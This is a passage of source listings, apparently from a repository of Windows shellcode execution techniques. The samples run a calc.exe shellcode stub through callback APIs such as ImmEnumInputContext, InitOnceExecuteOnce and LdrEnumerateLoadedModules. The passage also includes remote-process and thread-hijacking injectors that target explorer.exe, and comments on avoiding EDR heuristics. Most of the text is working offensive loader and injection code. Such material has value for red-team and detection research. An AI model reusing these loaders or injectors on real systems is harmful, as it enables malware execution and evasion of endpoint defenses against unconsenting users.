21 | "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" 22 | "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" 23 | "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" 24 | "\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff" 25 | "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" 26 | "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c" 27 | "\x63\x2e\x65\x78\x65\x00"; 28 | 29 | 30 | 31 | int main() { 32 | 33 | 34 | LPVOID addr = ::VirtualAlloc(NULL, sizeof(op), MEM_COMMIT, PAGE_EXECUTE_READWRITE); /* NOTE(review): unchecked — a NULL result is dereferenced by RtlMoveMemory below; RWX allocation is also unnecessary here (RW, then VirtualProtect to PAGE_EXECUTE_READ keeps W^X) */ 35 | ::RtlMoveMemory(addr, op, sizeof(op)); 36 | 37 | HANDLE hImg = ::CreateFileW(L"C:\\Windows\\System32\\ntdll.dll", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); 38 | HANDLE dummy; /* NOTE(review): never initialized. The DigestHandle argument is an opaque caller-supplied value that ImageGetDigestStream forwards to the callback; it is not an output parameter, so nothing is ever stored here */ 39 | 40 | if (hImg) { /* CreateFileW reports failure with INVALID_HANDLE_VALUE, which is non-NULL, so this test never catches a failed open — compare against INVALID_HANDLE_VALUE */ 41 | 42 | ::ImageGetDigestStream(hImg, CERT_PE_IMAGE_DIGEST_ALL_IMPORT_INFO, (DIGEST_FUNCTION)addr, &dummy); /* BOOL return ignored; the callback runs the payload on the first digest chunk */ 43 | ::CloseHandle(dummy); /* closes an indeterminate handle value: this can close an unrelated handle of this process, or raise an invalid-handle exception under a debugger — remove */ 44 | 45 | } 46 | 47 | ::CloseHandle(hImg); /* also executed when hImg is INVALID_HANDLE_VALUE */ 48 | 49 | } -------------------------------------------------------------------------------- /Shellcode Execution/ImageGetDigestStream/ImageGetDigestStream.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /Shellcode Execution/ImmEnumInputContext/ImmEnumInputContext.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #pragma comment(lib, "Imm32.lib") 6 | 7 | // alfarom256 calc
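// shellcode (comment continued from the previous listing line)
// x64 payload that starts calc.exe; bytes copied verbatim from the original sample, not re-verified here.
unsigned char op[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
"\x63\x2e\x65\x78\x65\x00";

// Runs the payload through the ImmEnumInputContext enumeration callback.
// Returns 0 when the enumeration call succeeded, 1 on any failure.
int main() {
    // Stage the payload RW and flip to RX after the copy: a private RWX region is a
    // common EDR/scanner heuristic and is not needed here (assumes the payload never
    // writes to its own bytes - believed true for this calc stub, re-check for others).
    LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    if (!address) { return 1; }
    memcpy(address, op, sizeof(op));
    DWORD oldProtect = 0;
    if (!::VirtualProtect(address, sizeof(op), PAGE_EXECUTE_READ, &oldProtect)) { return 1; }

    // idThread 0 = calling thread; the "enumeration callback" is the payload.
    // NOTE(review): the callback presumably only fires if this thread owns at least
    // one input context - confirm that holds for a console process.
    if (!::ImmEnumInputContext(0, (IMCENUMPROC)address, 0)) { return 1; }
    return 0;
}
--------------------------------------------------------------------------------
/Shellcode Execution/ImmEnumInputContext/ImmEnumInputContext.vcxproj.filters:
--------------------------------------------------------------------------------
{4FC737F1-C7A5-4376-A066-2A32D752A2FF}
cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
{93995380-89BD-4b04-88EB-625FBE52EBFB}
h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
Source Files
--------------------------------------------------------------------------------
/Shellcode Execution/InitOnceExecuteOnce/InitOnceExecuteOnce.cpp:
--------------------------------------------------------------------------------
// (include targets were stripped from this listing)
#include
#include

// alfarom256 calc shellcode (x64, starts calc.exe; copied verbatim)
unsigned char op[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
"\x63\x2e\x65\x78\x65\x00";

// Runs the payload as the "init function" of a one-time initialization block.
// Returns 0 when InitOnceExecuteOnce reported success, 1 on any failure.
int main() {
    // Stage RW, then switch to RX: no private RWX region, and the payload is not
    // expected to write to its own bytes.
    LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    if (!address) { return 1; }
    memcpy(address, op, sizeof(op));
    DWORD oldProtect = 0;
    if (!::VirtualProtect(address, sizeof(op), PAGE_EXECUTE_READ, &oldProtect)) { return 1; }

    // First (and only) execution of the init block calls the payload synchronously
    // on this thread. The unused process handle and status locals were dropped.
    INIT_ONCE initOnce = INIT_ONCE_STATIC_INIT;
    PVOID context = NULL;
    if (!::InitOnceExecuteOnce(&initOnce, (PINIT_ONCE_FN)address, NULL, &context)) { return 1; }
    return 0;
}
--------------------------------------------------------------------------------
/Shellcode Execution/InitOnceExecuteOnce/InitOnceExecuteOnce.vcxproj.filters:
--------------------------------------------------------------------------------
{4FC737F1-C7A5-4376-A066-2A32D752A2FF}
cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
{93995380-89BD-4b04-88EB-625FBE52EBFB}
h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
Source Files
--------------------------------------------------------------------------------
/Shellcode Execution/Injection Techniques/Process_Injection.c:
--------------------------------------------------------------------------------
/* (include targets were stripped from this listing) */
#include
#include

/* Payload to run in the target. Empty placeholder: sizeof buf == 1 (just the NUL). */
unsigned char buf[] = "";

/* Classic remote injection: allocate in the target, write the payload, start a
 * remote thread on it. The PID is hard-coded (TODO: take it from argv).
 * Returns 0 on success, 1 on any failure; handles are closed on every path. */
int main(int argc, char *argv[])
{
    const DWORD pid = 11096;
    int rc = 1;
    HANDLE h_process = NULL;
    HANDLE h_thread = NULL;
    PVOID va = NULL;
    DWORD old_protect = 0;

    (void)argc;
    (void)argv;

    if (sizeof buf <= 1)
    {
        printf("[X] No payload embedded in buf\n");
        return 1;
    }

    /* Only the rights the steps below need, instead of PROCESS_ALL_ACCESS. */
    h_process = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION |
                            PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ,
                            FALSE, pid);
    if (h_process == NULL)
    {
        printf("[X] Could not obtain handle\n");
        return 1;
    }

    /* RW first, RX after the write: no RWX region in the target. */
    va = VirtualAllocEx(h_process, NULL, sizeof buf, (MEM_RESERVE | MEM_COMMIT), PAGE_READWRITE);
    if (va == NULL)
    {
        printf("[X] VirtualAllocEx failed (%lu)\n", GetLastError());
        goto cleanup;
    }
    if (!WriteProcessMemory(h_process, va, buf, sizeof buf, NULL))
    {
        printf("[X] WriteProcessMemory failed (%lu)\n", GetLastError());
        goto cleanup;
    }
    if (!VirtualProtectEx(h_process, va, sizeof buf, PAGE_EXECUTE_READ, &old_protect))
    {
        printf("[X] VirtualProtectEx failed (%lu)\n", GetLastError());
        goto cleanup;
    }

    h_thread = CreateRemoteThread(h_process, NULL, 0, (LPTHREAD_START_ROUTINE)va, NULL, 0, NULL);
    if (h_thread == NULL)
    {
        printf("[X] CreateRemoteThread failed (%lu)\n", GetLastError());
        goto cleanup;
    }
    rc = 0;

cleanup:
    if (h_thread != NULL) CloseHandle(h_thread);
    CloseHandle(h_process);
    return rc;
}
--------------------------------------------------------------------------------
/Shellcode Execution/Injection Techniques/Thread_Injection.c:
--------------------------------------------------------------------------------
/* (include targets were stripped from this listing) */
#include
#include
#include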
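#include
#include

/* Returns the PID of the first process whose image name matches processName
 * (case-insensitive, Windows image names are not case-sensitive), or 0 when no
 * process matches or the snapshot cannot be taken. The snapshot handle is
 * always released (the original leaked it and fell off the end of the function
 * without a return value when nothing matched). */
DWORD getProcessId(const char *processName) {
    DWORD pid = 0;
    /* CreateToolhelp32Snapshot signals failure with INVALID_HANDLE_VALUE, not NULL. */
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnapshot == INVALID_HANDLE_VALUE) {
        return 0;
    }
    PROCESSENTRY32 entry;
    entry.dwSize = sizeof(PROCESSENTRY32);
    if (Process32First(hSnapshot, &entry)) {
        do {
            if (_stricmp(entry.szExeFile, processName) == 0) {
                pid = entry.th32ProcessID;
                break;
            }
        } while (Process32Next(hSnapshot, &entry));
    }
    CloseHandle(hSnapshot);
    return pid;
}

/* Payload to run in the target. Empty placeholder: sizeof shellcode == 1 (just the NUL). */
unsigned char shellcode[] = "";

/* Thread hijacking: write the payload into the target, suspend one of its
 * threads, point RIP at the payload and resume it. Nothing saves or restores
 * the original context, so the hijacked thread never returns to whatever it
 * was doing - pick a target that can afford to lose a thread.
 * Usage: thread-injector.exe [process.exe]  (default: explorer.exe)
 * Returns 0 on success, 1 on any failure; handles are closed on every path. */
int main(int argc, char *argv[]) {
    LPCSTR processName = "explorer.exe";
    int rc = 1;
    DWORD processId = 0;
    HANDLE h_process = NULL;
    HANDLE h_thread = NULL;
    HANDLE h_snapshot = INVALID_HANDLE_VALUE;
    PVOID b_shellcode = NULL;
    DWORD oldProtect = 0;
    THREADENTRY32 threadEntry;
    CONTEXT context;

    if (argc == 2 && strcmp(argv[1], "-h") == 0) {
        printf("\nUsage:\n");
        printf("thread-injector.exe \n");
        printf("\nIf no process provided, it will attempt to inject into explorer.exe\n\n");
        return 0;
    }
    if (argc == 2) {
        /* The original printed processName before assigning it (always ""). */
        processName = argv[1];
        printf("Attempting to inject into %s", processName);
    } else {
        printf("No process provided, injecting into explorer.exe\n");
    }

    if (sizeof shellcode <= 1) {
        printf("\n[-] No payload embedded in shellcode[], aborting");
        return 1;
    }

    processId = getProcessId(processName);
    if (processId == 0) {
        /* The original printed this and then carried on with PID 0. */
        printf("\n[-] Cound not obtain PID, aborting");
        return 1;
    }
    printf("\n[+] PID:%lu", processId);

    /* Only the rights needed for alloc/write/protect, not PROCESS_ALL_ACCESS. */
    h_process = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION |
                            PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, processId);
    if (h_process == NULL) {
        printf("\n[-] OpenProcess failed (%lu)", GetLastError());
        return 1;
    }

    /* RW first, RX after the write: no RWX region left in the target. */
    b_shellcode = VirtualAllocEx(h_process, NULL, sizeof shellcode, (MEM_RESERVE | MEM_COMMIT), PAGE_READWRITE);
    if (b_shellcode == NULL) {
        printf("\n[-] VirtualAllocEx failed (%lu)", GetLastError());
        goto cleanup;
    }
    if (!WriteProcessMemory(h_process, b_shellcode, shellcode, sizeof shellcode, NULL)) {
        printf("\n[-] WriteProcessMemory failed (%lu)", GetLastError());
        goto cleanup;
    }
    if (!VirtualProtectEx(h_process, b_shellcode, sizeof shellcode, PAGE_EXECUTE_READ, &oldProtect)) {
        printf("\n[-] VirtualProtectEx failed (%lu)", GetLastError());
        goto cleanup;
    }

    /* Pick the first thread of the target we can open. The original skipped the
     * first snapshot entry (Thread32First result was never examined) and left
     * h_thread uninitialized when no thread matched. */
    h_snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
    if (h_snapshot == INVALID_HANDLE_VALUE) {
        printf("\n[-] CreateToolhelp32Snapshot failed (%lu)", GetLastError());
        goto cleanup;
    }
    threadEntry.dwSize = sizeof(THREADENTRY32);
    if (Thread32First(h_snapshot, &threadEntry)) {
        do {
            if (threadEntry.th32OwnerProcessID != processId) {
                continue;
            }
            h_thread = OpenThread(THREAD_SUSPEND_RESUME | THREAD_GET_CONTEXT | THREAD_SET_CONTEXT,
                                  FALSE, threadEntry.th32ThreadID);
            if (h_thread != NULL) {
                break;
            }
        } while (Thread32Next(h_snapshot, &threadEntry));
    }
    CloseHandle(h_snapshot);
    if (h_thread == NULL) {
        printf("\n[-] No thread of the target could be opened");
        goto cleanup;
    }

    /* Suspend, swap RIP, resume. A failed SetThreadContext must still resume the
     * thread, otherwise the target is left with a frozen thread. */
    if (SuspendThread(h_thread) == (DWORD)-1) {
        printf("\n[-] SuspendThread failed (%lu)", GetLastError());
        goto cleanup;
    }
    context.ContextFlags = CONTEXT_FULL;
    if (!GetThreadContext(h_thread, &context)) {
        printf("\n[-] GetThreadContext failed (%lu)", GetLastError());
        ResumeThread(h_thread);
        goto cleanup;
    }
    context.Rip = (DWORD_PTR)b_shellcode;
    if (!SetThreadContext(h_thread, &context)) {
        printf("\n[-] SetThreadContext failed (%lu)", GetLastError());
        ResumeThread(h_thread);
        goto cleanup;
    }
    ResumeThread(h_thread);
    rc = 0;

cleanup:
    if (h_thread != NULL) CloseHandle(h_thread);
    CloseHandle(h_process);
    return rc;
}
--------------------------------------------------------------------------------
/Shellcode Execution/LdrEnumerateLoadedModules/LdrEnumerateLoadedModules.cpp:
--------------------------------------------------------------------------------
// (include targets were stripped from this listing)
#include
#include

// alfarom256 calc shellcode (x64, starts calc.exe; copied verbatim)
unsigned char op[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
"\x63\x2e\x65\x78\x65\x00";

// including ntdef.h was breaking the program so I just simply got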
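// the typedef from:
// https://docs.microsoft.com/en-us/windows/win32/api/ntdef/ns-ntdef-_unicode_string

typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;

// https://doxygen.reactos.org/d1/d97/ldrtypes_8h_source.html
// Layout copied from ReactOS. The "callback" below is the payload and is not
// expected to dereference the entry, so field drift against a given Windows
// build does not affect this sample; it would matter for a real callback.

typedef PVOID PACTIVATION_CONTEXT;

typedef struct _LDR_DATA_TABLE_ENTRY
{
    LIST_ENTRY InLoadOrderLinks;
    LIST_ENTRY InMemoryOrderLinks;
    LIST_ENTRY InInitializationOrderLinks;
    PVOID DllBase;
    PVOID EntryPoint;
    ULONG SizeOfImage;
    UNICODE_STRING FullDllName;
    UNICODE_STRING BaseDllName;
    ULONG Flags;
    USHORT LoadCount;
    USHORT TlsIndex;
    union
    {
        LIST_ENTRY HashLinks;
        struct
        {
            PVOID SectionPointer;
            ULONG CheckSum;
        };
    };
    union
    {
        ULONG TimeDateStamp;
        PVOID LoadedImports;
    };
    PACTIVATION_CONTEXT EntryPointActivationContext;
    PVOID PatchInformation;
} LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY;

typedef VOID(NTAPI LDR_ENUM_CALLBACK)(_In_ PLDR_DATA_TABLE_ENTRY ModuleInformation, _In_ PVOID Parameter, _Out_ BOOLEAN* Stop);
typedef LDR_ENUM_CALLBACK* PLDR_ENUM_CALLBACK;

// https://doxygen.reactos.org/d7/d55/ldrapi_8c.html#ac623c02eff0b751a63f8573eaca95153

typedef NTSTATUS(__stdcall* _LdrEnumerateLoadedModules)(
    BOOL ReservedFlag,
    LDR_ENUM_CALLBACK EnumProc,
    PVOID context
    );

// Runs the payload as the per-module callback of ntdll!LdrEnumerateLoadedModules.
// Returns 0 when the enumeration reported success, 1 on any failure.
int main() {
    // Stage RW, then switch to RX: no private RWX region, and the payload is not
    // expected to write to its own bytes.
    LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    if (!address) { return 1; }
    memcpy(address, op, sizeof(op));
    DWORD oldProtect = 0;
    if (!::VirtualProtect(address, sizeof(op), PAGE_EXECUTE_READ, &oldProtect)) { return 1; }

    HMODULE hNtdll = ::GetModuleHandleW(L"ntdll");
    if (!hNtdll) { return 1; }

    // The original called through a NULL pointer if the export was missing.
    _LdrEnumerateLoadedModules LdrEnumerateLoadedModules =
        (_LdrEnumerateLoadedModules)::GetProcAddress(hNtdll, "LdrEnumerateLoadedModules");
    if (!LdrEnumerateLoadedModules) { return 1; }

    // Presumably invoked once per loaded module; the first call is enough for the payload.
    NTSTATUS status = LdrEnumerateLoadedModules(FALSE, (PLDR_ENUM_CALLBACK)address, NULL);
    // NTSTATUS failure codes are negative; avoids NT_SUCCESS/ntdef.h, which this file cannot include.
    return status < 0 ? 1 : 0;
}
--------------------------------------------------------------------------------
/Shellcode Execution/LdrEnumerateLoadedModules/LdrEnumerateLoadedModules.vcxproj.filters:
--------------------------------------------------------------------------------
{4FC737F1-C7A5-4376-A066-2A32D752A2FF}
cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
{93995380-89BD-4b04-88EB-625FBE52EBFB}
h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
Source Files
--------------------------------------------------------------------------------
/Shellcode Execution/LdrpCallInitRoutine/LdrpCallInitRoutine.vcxproj.filters:
--------------------------------------------------------------------------------
{4FC737F1-C7A5-4376-A066-2A32D752A2FF}
cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
{93995380-89BD-4b04-88EB-625FBE52EBFB}
h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
Source Files
--------------------------------------------------------------------------------
/Shellcode Execution/LdrpCallInitRoutine/Source.cpp:
--------------------------------------------------------------------------------
// (include targets were stripped from this listing)
#include
#include

// alfarom256 calc shellcode (x64, starts calc.exe; copied verbatim)
unsigned char op[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff"
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c"
"\x63\x2e\x65\x78\x65\x00";


typedef size_t(__fastcall* lpCallInitRoutine)(size_t, size_t, size_t);
typedef char(__fastcall* pLdrpCallInitRoutine)(lpCallInitRoutine, size_t, unsigned int, size_t);

// RVA of the unexported ntdll!LdrpCallInitRoutine, read off ONE specific ntdll
// build with the WinDbg expression below. It is not resolved at runtime, so on
// any other ntdll this most likely lands in unrelated code and crashes.
// TODO: resolve it from symbols or a byte signature before calling.
#define NTDLL_LDRPCALLINITRT_OFFSET 0x000199bc
// ? ntdll!LdrpCallInitRoutine - ntdll

// Runs the payload as the "init routine" handed to ntdll's internal
// LdrpCallInitRoutine helper. Returns 0 on success, -1 on any setup failure
// (the file's existing convention).
int main() {
    // Stage RW, then switch to RX: no private RWX region, and the payload is not
    // expected to write to its own bytes. The unused process handle was dropped.
    LPVOID address = ::VirtualAlloc(NULL, sizeof(op), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    if (!address) { return -1; }
    memcpy(address, &op[0], sizeof(op));
    DWORD oldProtect = 0;
    if (!::VirtualProtect(address, sizeof(op), PAGE_EXECUTE_READ, &oldProtect)) { return -1; }

    uintptr_t hNtdll = (uintptr_t)GetModuleHandleA("ntdll");
    if (!hNtdll) { return -1; }

    // todo: find a better way to get LdrpCallInitRoutine. I'm lazy right now.
    // (see the build-specific warning on NTDLL_LDRPCALLINITRT_OFFSET above)
    uintptr_t func = hNtdll + NTDLL_LDRPCALLINITRT_OFFSET;
    pLdrpCallInitRoutine LdrpCallInitRoutine = (pLdrpCallInitRoutine)func;
    LdrpCallInitRoutine((lpCallInitRoutine)address, 0, 0, 0);
    return 0;
}
--------------------------------------------------------------------------------
/Shellcode Execution/OpenThreadWaitChainSession/CreateTimerQueueTimer.cpp:
--------------------------------------------------------------------------------
// (include targets were stripped from this listing)
#include
#include
#include
#include
#define LEN 277 // unused: sizeof(op) is used for the copy

// alfarom256 calc shellcode (x64, starts calc.exe; copied verbatim)
unsigned char op[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
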